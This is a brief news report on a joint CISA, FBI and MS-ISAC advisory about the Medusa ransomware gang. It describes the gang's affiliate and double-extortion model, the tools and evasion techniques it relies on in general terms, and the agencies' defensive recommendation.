The Medusa ransomware gang has infected over 300 organizations across critical sectors, including healthcare, manufacturing, and technology, according to a joint advisory from CISA, the FBI, and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released Wednesday.
Active since 2021, Medusa initially operated as a closed ransomware group but later adopted an affiliate model. The gang uses a double-extortion strategy, encrypting victim data and threatening to leak it unless a ransom is paid. Ransom negotiations remain under the control of the developers, while affiliates execute the attacks.
Medusa actors typically use legitimate software tools like AnyDesk, Atera, and ConnectWise to infiltrate and move laterally within networks. They also rely on techniques to evade detection, such as “living-off-the-land” (LotL) methods and PowerShell commands. Notably, they use “bring your own vulnerable driver” (BYOVD) attacks to disable endpoint detection and response software, a method that has become common in ransomware attacks.
Symantec’s Threat Hunter team reported a 42% increase in Medusa activity in 2024, with attacks rising in January and February. In one case, the group used custom tools like AVKill and POORTRY to bypass security measures and exfiltrate data using RClone. After encrypting systems, the ransomware self-deleted to cover its tracks.
To counter the threat, CISA, the FBI, and MS-ISAC recommend disabling command-line and scripting functions to prevent privilege escalation and lateral movement by attackers.
